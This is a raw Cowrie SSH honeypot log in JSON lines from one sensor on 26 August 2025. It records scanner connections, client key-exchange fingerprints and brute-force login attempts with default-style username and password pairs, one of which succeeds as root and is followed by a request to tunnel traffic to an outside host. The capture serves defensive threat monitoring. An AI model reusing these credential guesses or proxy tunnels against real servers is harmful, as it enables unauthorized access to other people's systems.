{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:09:08.800945Z","src_ip":"172.236.228.245","session":"52f76f8de5e2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:09.639857Z","src_ip":"172.236.228.245","session":"52f76f8de5e2"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.245","src_port":8650,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a5e5f940fec","protocol":"ssh","message":"New connection: 172.236.228.245:8650 (1.2.3.4:22) [session: 4a5e5f940fec]","sensor":"my-vps","timestamp":"2025-08-26T12:09:09.837279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.079305Z","src_ip":"172.236.228.245","session":"4a5e5f940fec"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.080040Z","src_ip":"172.236.228.245","session":"4a5e5f940fec"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48434,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c149a33255a","protocol":"ssh","message":"New connection: 83.168.105.65:48434 (1.2.3.4:22) [session: 5c149a33255a]","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.563582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.564493Z","src_ip":"83.168.105.65","session":"5c149a33255a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.603739Z","src_ip":"83.168.105.65","session":"5c149a33255a"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.723738Z","src_ip":"83.168.105.65","session":"5c149a33255a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:10.982505Z","src_ip":"172.236.228.245","session":"4a5e5f940fec"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:11.765256Z","src_ip":"83.168.105.65","session":"5c149a33255a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35056,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8308f6ecce0","protocol":"ssh","message":"New connection: 212.227.235.229:35056 (1.2.3.4:22) [session: b8308f6ecce0]","sensor":"my-vps","timestamp":"2025-08-26T12:09:12.380410Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:12.381481Z","src_ip":"212.227.235.229","session":"b8308f6ecce0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35349,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a6a22612bbf","protocol":"ssh","message":"New connection: 212.227.235.229:35349 (1.2.3.4:22) [session: 7a6a22612bbf]","sensor":"my-vps","timestamp":"2025-08-26T12:09:12.563514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:12.564172Z","src_ip":"212.227.235.229","session":"7a6a22612bbf"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T12:09:12.723227Z","src_ip":"212.227.235.229","session":"7a6a22612bbf"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:09:13.201713Z","src_ip":"212.227.235.229","session":"7a6a22612bbf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T12:09:13.361512Z","session":"7a6a22612bbf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41996,"dst_ip":"1.2.3.4","dst_port":22,"session":"73025846f3e0","protocol":"ssh","message":"New connection: 83.168.105.65:41996 (1.2.3.4:22) [session: 73025846f3e0]","sensor":"my-vps","timestamp":"2025-08-26T12:09:26.014136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:26.015173Z","src_ip":"83.168.105.65","session":"73025846f3e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:09:26.052161Z","src_ip":"83.168.105.65","session":"73025846f3e0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:26.166707Z","src_ip":"83.168.105.65","session":"73025846f3e0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:27.206025Z","src_ip":"83.168.105.65","session":"73025846f3e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37974,"dst_ip":"1.2.3.4","dst_port":22,"session":"84abb8d41a89","protocol":"ssh","message":"New connection: 212.227.235.229:37974 (1.2.3.4:22) [session: 84abb8d41a89]","sensor":"my-vps","timestamp":"2025-08-26T12:09:31.379396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:31.673138Z","src_ip":"212.227.235.229","session":"84abb8d41a89"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:09:31.673836Z","src_ip":"212.227.235.229","session":"84abb8d41a89"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:33.616603Z","src_ip":"212.227.235.229","session":"84abb8d41a89"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:34.980747Z","src_ip":"212.227.235.229","session":"84abb8d41a89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52634,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad85efd9ac61","protocol":"ssh","message":"New connection: 212.227.125.160:52634 (1.2.3.4:22) [session: ad85efd9ac61]","sensor":"my-vps","timestamp":"2025-08-26T12:09:40.180961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:40.360839Z","src_ip":"212.227.125.160","session":"ad85efd9ac61"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:09:40.362343Z","src_ip":"212.227.125.160","session":"ad85efd9ac61"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:40.988314Z","src_ip":"212.227.125.160","session":"ad85efd9ac61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52646,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff4202f265c9","protocol":"ssh","message":"New connection: 212.227.125.160:52646 (1.2.3.4:22) [session: ff4202f265c9]","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.122763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.386914Z","src_ip":"212.227.125.160","session":"ff4202f265c9"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.387676Z","src_ip":"212.227.125.160","session":"ff4202f265c9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":46998,"dst_ip":"1.2.3.4","dst_port":22,"session":"98884494a767","protocol":"ssh","message":"New connection: 83.168.105.65:46998 (1.2.3.4:22) [session: 98884494a767]","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.572380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.573412Z","src_ip":"83.168.105.65","session":"98884494a767"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.611987Z","src_ip":"83.168.105.65","session":"98884494a767"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.725264Z","src_ip":"83.168.105.65","session":"98884494a767"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.879141Z","src_ip":"212.227.125.160","session":"ff4202f265c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52652,"dst_ip":"1.2.3.4","dst_port":22,"session":"0450378c653d","protocol":"ssh","message":"New connection: 212.227.125.160:52652 (1.2.3.4:22) [session: 0450378c653d]","sensor":"my-vps","timestamp":"2025-08-26T12:09:41.977222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:42.152832Z","src_ip":"212.227.125.160","session":"0450378c653d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:09:42.153640Z","src_ip":"212.227.125.160","session":"0450378c653d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:42.707410Z","src_ip":"212.227.125.160","session":"0450378c653d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:42.764180Z","src_ip":"83.168.105.65","session":"98884494a767"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56846,"dst_ip":"1.2.3.4","dst_port":22,"session":"269f20016c39","protocol":"ssh","message":"New connection: 83.168.105.65:56846 (1.2.3.4:22) [session: 269f20016c39]","sensor":"my-vps","timestamp":"2025-08-26T12:09:57.080424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:57.081342Z","src_ip":"83.168.105.65","session":"269f20016c39"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:09:57.120554Z","src_ip":"83.168.105.65","session":"269f20016c39"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:57.240126Z","src_ip":"83.168.105.65","session":"269f20016c39"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:58.281781Z","src_ip":"83.168.105.65","session":"269f20016c39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15384,"dst_ip":"1.2.3.4","dst_port":22,"session":"56d9ae0b5e7b","protocol":"ssh","message":"New connection: 212.227.235.229:15384 (1.2.3.4:22) [session: 56d9ae0b5e7b]","sensor":"my-vps","timestamp":"2025-08-26T12:10:00.056257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:00.599093Z","src_ip":"212.227.235.229","session":"56d9ae0b5e7b"}
